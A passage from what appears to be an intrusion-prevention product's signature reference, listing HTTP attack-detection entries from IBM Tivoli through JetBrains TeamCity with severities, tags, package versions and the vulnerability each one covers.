Tags: Any Operating System, Any Hardware, IBM Tivoli Provisioning Manager for OS Deployment, CVE2007, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-1225-5242
Vulnerability: IBM-Tivoli-Provisioning-Manager-OS-Deployment-Buffer-Overflow
Description:
Back to top

HTTP_CSU-IBM-WebSphere-Application-Server-Cross-Site-Scripting

About this situation: An attempt to exploit a cross-site scripting vulnerability in IBM WebSphere Application Server was detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, IBM WebSphere Application Server, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: Generic_IBM-WebSphere-Application-Server-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-IIS-ActivePerl-PerlIS.dll-Filename-Overflow

About this situation: Detected a possible attempt to exploit remote buffer overflow in ActivePerl
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, ActivePerl, CVE2001, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-167-2032
Last changed: sgpkg-ips-167-2032
Vulnerability: HTTP-IIS-ActivePerl-PerlIS.dll-Filename-Overflow
Description:
Back to top

HTTP_CSU-IIS-FormJScript-Access

About this situation: Detected access to vulnerable iis sample script
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, IIS, Windows not specific, IIS not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-167-2032
Last changed: sgpkg-ips-167-2032
Vulnerability: HTTP-IIS-Form_JScript-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-IIS-Global-Asa-Access

About this situation: IIS Isapi global.asa access
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, IIS, Windows not specific, IIS not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-IIS-Isapi-Global-Asa-Configuration-Vulnerability
Description:
Back to top

HTTP_CSU-IIS-Htr-Buffer-Overflow

About this situation: Buffer Overflow attempt
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, IIS 4.0, MS1999, CVE1999, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-IIS-BOF-MS99-019
Description:
Back to top

HTTP_CSU-IIS-Htr-File-Fragment-Disclosure

About this situation: Detected attempt to disclose file contents via htr vulnerability
Context: HTTP Request URI
Severity: 2
Tags: Windows, Any Hardware, IIS, MS2000, MS2001, CVE2000, Windows not specific, IIS not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-167-2032
Last changed: sgpkg-ips-1169-5242
Vulnerability: IIS-Iisadmpwd-DoS
HTTP-IIS-Htr-Code-Fragment-Disclosure
HTTP-IIS-File-Fragment-Disclosure
Description:
Back to top

HTTP_CSU-IIS-Iissamples-Disclosure

About this situation: IIS Iissamaples Disclosure
Context: HTTP Request URI
Severity: 2
Tags: Windows, Any Hardware, IIS, MS2000, CVE2000, Windows not specific, IIS not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-260-3038
Vulnerability: HTTP-IIS-Iissample-Discovery
Description:
Back to top

HTTP_CSU-IIS-Index-Server-Path-Disclosure-Vulnerability

About this situation: IIS Index Server SQLQHit.asp Path Disclosure
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, IIS, CVE1999, Windows not specific, IIS not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-IIS-Index-Server-Path-Disclosure-Vulnerability
Description:
Back to top

HTTP_CSU-IIS-ISM-DLL-Access

About this situation: Access to ism.dll in IIS
Context: HTTP Request URI
Severity: 2
Tags: Windows, Any Hardware, IIS, CVE1999, Windows not specific, IIS not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-IIS-ISM-DLL-Administration-Vulnerability
Description:
Back to top

HTTP_CSU-IIS-Phone-Book-BOF

About this situation: IIS Isapi extension buffer overflow
Context: HTTP Request URI
Severity: 10
Tags: Windows, Any Hardware, IIS 5.0, IIS 4.0, IIS 5.1, MS2000, CVE2000, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-925-5242
Vulnerability: HTTP-Internet-Information-Server-Phone-Book-Service-BOF
Description:
Back to top

HTTP_CSU-IIS-ServerVariablesJScript-Path-Disclosure

About this situation: Detected access to vulnerable iis sample script
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, IIS, Windows not specific, IIS not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-168-2032
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-IIS-ServerVariables-JScript-Path-Disclosure-Vulnerability
Description:
Back to top

HTTP_CSU-Illusion-Bot-Activity

About this situation: Illusion Bot activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Illusion-Bot
Description:
Back to top

HTTP_CSU-iMeshV8-Download

About this situation: iMeshV8 Download detected
Context: HTTP Request URI
Severity: 2
Tags: Windows, Any Hardware, iMesh, Windows not specific, iMesh not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-202-2032
Last changed: sgpkg-ips-506-5211
Vulnerability: IM2Net-Peer-To-Peer-Network-Usage
Description:
Back to top

HTTP_CSU-Includer-Command-Execution

About this situation: Command execution attack against Includer detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, The Includer, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-27-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Includer-Command-Execution
Description:
Back to top

HTTP_CSU-Index-Server-Source-Code-Disclosure

About this situation: Possible source code disclosure detected
Context: HTTP Request URI
Severity: 2
Tags: Windows, Any Hardware, Microsoft Index Server, MS2000, CVE2000, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-681-5211
Vulnerability: HTTP-Index-Server-Source-Code-Disclosure
Description:
Back to top

HTTP_CSU-Indusoft-Web-Studio-sDoS-Denial-Of-Service

About this situation: Indusoft Web Studio sDoS denial of service.
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, InduSoft Web Studio, Windows not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-628-5211
Vulnerability: Indusoft-Web-Studio-sDoS-Denial-Of-Service
Description:
Back to top

HTTP_CSU-Insecure-Microsoft-Library-Loading

About this situation: An attempt to exploit a Microsoft library loading vulnerability detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, MS2011-03, MS2011-09, MS2012-03, CVE2011, CVE2012, CVE2013, CVE2014, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-1640-5242
Vulnerability: Microsoft-Remote-Desktop-Insecure-Library-Loading-CVE-2011-0029
Microsoft-Office-Insecure-Library-Loading
Microsoft-Expression-Design-Insecure-Library-Loading-CVE-2012-0016
Umplayer-Wintab32.dll-Insecure-Library-Loading
Corel-PDF-Fusion-Wintab32.dll-Insecure-Library-Loading
Soda-PDF-Insecure-Library-Loading
Corel-Paintshop-Pro-Insecure-Library-Loading
Corel-Multiple-Products-Multiple-Insecure-Library-Loading
Description:
Back to top

HTTP_CSU-Internet-Explorer-Cross-Domain-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Internet Explorer was detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-02, CVE2015, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-628-5211
Vulnerability: Internet-Explorer-Cross-Domain-Information-Disclosure
Description:
Back to top

HTTP_CSU-Internet-Explorer-Domain-Url-Spoofing

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2004-12, CVE2003, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Internet-Explorer-Domain-Url-Spoofing
Description:
Back to top

HTTP_CSU-Internet-Explorer-Insecure-Library-Loading-CVE-2011-2019

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2011-12, CVE2011, Windows not specific, Internet Explorer not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-428-4219
Vulnerability: Internet-Explorer-Insecure-Library-Loading-CVE-2011-2019
Description:
Back to top

HTTP_CSU-Internetoptimizer

About this situation: InternetOptimizer traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, InternetOptimizer, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Internetoptimizer
Description:
Back to top

HTTP_CSU-Intersystems-Cache-DoS-1

About this situation: A vulnerability in Intersystems Cache, allowing DoS.
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Intersystems Cache, Windows not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Intersystems-Cache-DoS-1
Description:
Back to top

HTTP_CSU-Intersystems-Cache-DoS-2

About this situation: A vulnerability in Intersystems Cache, allowing DoS.
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Intersystems Cache, Windows not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Intersystems-Cache-DoS-2
Description:
Back to top

HTTP_CSU-IOServer-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in IOServer detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, IOServer, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-607-5211
Vulnerability: IOServer-Directory-Traversal
Description:
Back to top

HTTP_CSU-Ipswitch-IMail-Web-Calendar-File-Disclosure

About this situation: Directory traversal attempt via Ipswitch IMail Web Calendar
Context: HTTP Request URI
Severity: 2
Tags: Windows XP, Windows NT, Windows 2000, Windows 2003, Any Hardware, IMail, CVE2005, Windows XP not specific, Windows NT not specific, Windows 2000 not specific, Windows 2003 not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-186-2032
Vulnerability: IMAP-Ipswitch-IMail-Web-Calendar-File-Disclosure
Description:
Back to top

HTTP_CSU-Ipswitch-WhatsUp-Gold-HTTP-Request-DoS

About this situation: An attempt to exploit a vulnerability in Ipswitch WhatsUp detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Ipswitch WhatsUp Gold, CVE2004, Any Operating System not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-531-5211
Vulnerability: Ipswitch-WhatsUp-Gold-HTTP-Request-DoS
Description:
Back to top

HTTP_CSU-Ipswitch-WhatsUp-Professional-SQL-Injection

About this situation: SQL injection attempt against Ipswitch WhatsUp Professional
Context: HTTP Request URI
Severity: 7
Tags: Windows, x86, WhatsUp Professional, CVE2005, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-420-4219
Vulnerability: HTTP-Ipswitch-WhatsUp-Web-Interface-SQL-Injection
Description:
Back to top

HTTP_CSU-ipTime-G104BE-Router-Code-Execution

About this situation: An attempt to exploit a vulnerability in ipTime G104BE router detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ipTime G104BE routers, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: ipTime-G104BE-Router-Code-Execution
Description:
Back to top

HTTP_CSU-IRIX-Webdist-RCE

About this situation: An attempt to exploit a vulnerability in Irix webdist.cgi detected
Context: HTTP Request URI
Severity: 10
Tags: IRIX, Any Hardware, CVE1999, IRIX not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-253-3038
Vulnerability: HTTP-IRIX-Webdist-RCE
Description:
Back to top

HTTP_CSU-Ivanti-Avalanche-Imagefilepath-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1473-5242
Last changed: sgpkg-ips-1473-5242
Vulnerability: Ivanti-Avalanche-Imagefilepath-Directory-Traversal
Description:
Back to top

HTTP_CSU-Ivanti-Avalanche-Resourcefilter-Dofilter-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1808-5242
Last changed: sgpkg-ips-1808-5242
Vulnerability: Ivanti-Avalanche-Resourcefilter-Dofilter-Directory-Traversal
Description:
Back to top

HTTP_CSU-Ivanti-Avalanche-Smartdeviceserver-Uploadfile-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: Ivanti-Avalanche-Smartdeviceserver-Uploadfile-Directory-Traversal
Description:
Back to top

HTTP_CSU-Ivanti-Cloud-Services-Appliance-Broker-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Ivanti Cloud Service Appliance detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Cloud Services Appliance, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1796-5242
Vulnerability: Ivanti-Cloud-Services-Appliance-Broker-Authentication-Bypass
Description:
Back to top

HTTP_CSU-Ivanti-Cloud-Services-Appliance-Path-Traversal-CVE-2024-8963

About this situation: An attempt to exploit a vulnerability in Ivanti Cloud Services Appliance detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Cloud Services Appliance, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1793-5242
Last changed: sgpkg-ips-1793-5242
Vulnerability: Ivanti-Cloud-Services-Appliance-Path-Traversal-CVE-2024-8963
Description:
Back to top

HTTP_CSU-Ivanti-Connect-Auth-Bypass-CVE-2024-22024

About this situation: An attempt to exploit a vulnerability in Ivanti Connect Secure detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Connect Secure, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1691-5242
Last changed: sgpkg-ips-1691-5242
Vulnerability: Ivanti-Connect-Secure-Server-Side-Request-Forgery-CVE-2024-21893
Description:
Back to top

HTTP_CSU-Ivanti-Connect-Secure-Authentication-Bypass-CVE-2023-46805

About this situation: An attempt to exploit a vulnerability in Ivanti Connect Secure detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Connect Secure, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1676-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: Ivanti-Connect-Secure-Authentication-Bypass-CVE-2023-46805
Description:
Back to top

HTTP_CSU-Ivanti-Connect-Secure-Command-Injection-CVE-2024-21887

About this situation: An attempt to exploit a vulnerability in Ivanti Connect Secure detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Connect Secure, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1676-5242
Last changed: sgpkg-ips-1676-5242
Vulnerability: Ivanti-Connect-Secure-Command-Injection-CVE-2024-21887
Description:
Back to top

HTTP_CSU-Ivanti-Connect-Secure-Server-Side-Request-Forgery-CVE-2024-21893

About this situation: An attempt to exploit a vulnerability in Ivanti Connect Secure detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Connect Secure, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1688-5242
Last changed: sgpkg-ips-1691-5242
Vulnerability: Ivanti-Connect-Secure-Server-Side-Request-Forgery-CVE-2024-21893
Description:
Back to top

HTTP_CSU-Ivanti-Endpoint-Manager-Mobile-Authentication-Bypass-CVE-2023-35078

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager Mobile detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager Mobile, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1617-5242
Last changed: sgpkg-ips-1620-5242
Vulnerability: Ivanti-Endpoint-Manager-Mobile-Authentication-Bypass-CVE-2023-35078
Description:
Back to top

HTTP_CSU-Ivanti-Endpoint-Manager-Servermemory-Loadmoduletable-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: Ivanti-Endpoint-Manager-Servermemory-Loadmoduletable-SQL-Injection
Description:
Back to top

HTTP_CSU-JamMail-Command-Execution

About this situation: Command execution attempt against jammail.pl script in JamMail
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, JamMail, CVE2005, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-JamMail-Command-Execution
Description:
Back to top

HTTP_CSU-JasperSoft-JasperReports-Server-Information-Disclosure-CVE-2018-5430

About this situation: An attempt to exploit a vulnerability in JasperReports Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, JasperSoft, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1542-5242
Last changed: sgpkg-ips-1542-5242
Vulnerability: JasperSoft-JasperReports-Server-Information-Disclosure-CVE-2018-5430
Description:
Back to top

HTTP_CSU-JasperSoft-JasperReports-Server-Path-Traversal-CVE-2018-18809

About this situation: An attempt to exploit a vulnerability in JasperReports Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, JasperSoft, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1542-5242
Last changed: sgpkg-ips-1542-5242
Vulnerability: JasperSoft-JasperReports-Server-Path-Traversal-CVE-2018-18809
Description:
Back to top

HTTP_CSU-Jboss-Java-Application-Server-Source-Code-Disclosure

About this situation: An attempt to exploit a vulnerability in JBoss Java Application Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-684-5211
Description:
Back to top

HTTP_CSU-Jboss_Seam_2_Code_Injection

About this situation: An attempt to exploit a vulnerability in JBoss Seam 2 detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Red Hat JBoss Enterprise Application Platform, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-659-5211
Vulnerability: Jboss_Seam_2_Code_Injection
Description:
Back to top

HTTP_CSU-Jenkins-Amazon-EC2-Plugin-Cross-Site-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Amazon EC2 plugin for Jenkins detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2020, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1276-5242
Last changed: sgpkg-ips-1276-5242
Vulnerability: Jenkins-Amazon-EC2-Plugin-Cross-Site-Request-Forgery
Description:
Back to top

HTTP_CSU-Jenkins-Ci-Server-Gitlab-Hook-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins Gitlab Hook Plugin detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1219-5242
Last changed: sgpkg-ips-1219-5242
Vulnerability: Jenkins-Ci-Server-Gitlab-Hook-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Jenkins-Ci-Server-Groovy-Pipeline-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Jenkins Groovy Plugin detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1190-5242
Last changed: sgpkg-ips-1190-5242
Vulnerability: Jenkins-Ci-Server-Groovy-Pipeline-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-Jenkins-Credentials-Plugin-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins Credentials Plugin detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1350-5242
Vulnerability: Jenkins-Credentials-Plugin-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Jenkins-Plugin-Resources-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Jenkins Jenkins detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1045-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: Jenkins-Plugin-Resources-Directory-Traversal
Description:
Back to top

HTTP_CSU-Jenkins-Sidebar-Link-Plugin-Icon-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Jenkins Sidebar Link Plugin detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins Sidebar Link Plugin, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1600-5242
Last changed: sgpkg-ips-1600-5242
Vulnerability: Jenkins-Sidebar-Link-Plugin-Icon-Directory-Traversal
Description:
Back to top

HTTP_CSU-JetBrains-TeamCity-Authentication-Bypass-CVE-2023-42793

About this situation: An attempt to exploit a vulnerability in JetBrains TeamCity detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, JetBrains TeamCity, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1636-5242
